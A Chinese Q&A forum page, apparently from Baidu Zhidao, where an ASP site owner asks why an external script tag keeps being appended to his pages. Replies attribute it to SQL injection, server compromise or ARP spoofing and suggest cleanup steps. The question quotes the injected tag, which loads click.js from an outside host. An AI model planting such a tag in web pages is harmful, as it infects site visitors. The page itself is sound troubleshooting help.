UC知道Asp 网站故障
来源:百度知道 编辑:UC知道 时间:2024/09/22 11:51:26
网站上传后,能正常进行浏览,但过一两天就无法在浏览了,再检查代码,发现在</html>后多了一段:<script language="javascript" src="http://conn.ass0.fr/click.js?wo=925&ghj=86"></script>
到底是网站代码编写出错而自动生成的;还是因为FTP泄露,有人恶意加上去的。
最初遇到的情况是google搜索引擎报:“该网站可能含有恶意软件,有可能会危害您的电脑。”网站打开后瑞星检测有毒,几经修改后便出现了开头所说的情况。
为此,“上面的人”很是大发雷霆,可惜我对asp代码不甚了解,没法,只能悬赏求教。
我摘了几个页面的代码:http://www.tjsanji.com/ym
望各位大虾能帮忙看看。
到底是网站代码编写出错而自动生成的;还是因为FTP泄露,有人恶意加上去的。
最初遇到的情况是google搜索引擎报:“该网站可能含有恶意软件,有可能会危害您的电脑。”网站打开后瑞星检测有毒,几经修改后便出现了开头所说的情况。
为此,“上面的人”很是大发雷霆,可惜我对asp代码不甚了解,没法,只能悬赏求教。
我摘了几个页面的代码:http://www.tjsanji.com/ym
望各位大虾能帮忙看看。
这种iframe或者script嵌入木马在asp服务器上比较常见,有这么几个可能:
1、asp程序有漏洞,利用slq注入被人登录后台后上传木马;
2、服务器由于其他原因中招,被植入木马
3、服务器所在局域网的其他机器被ARP欺骗,在页面传输过程中修改网页(这种情况下,查看服务器源码没有问题)
你的情况应该是前两种之一。最好给服务器换一个杀毒软件并安装防火墙,然后重新上传所有的源代码。在修复期间,请断网操作。
关于更多iframe嵌入木马请搜索百度。
你的网站有漏洞,被人放了木马。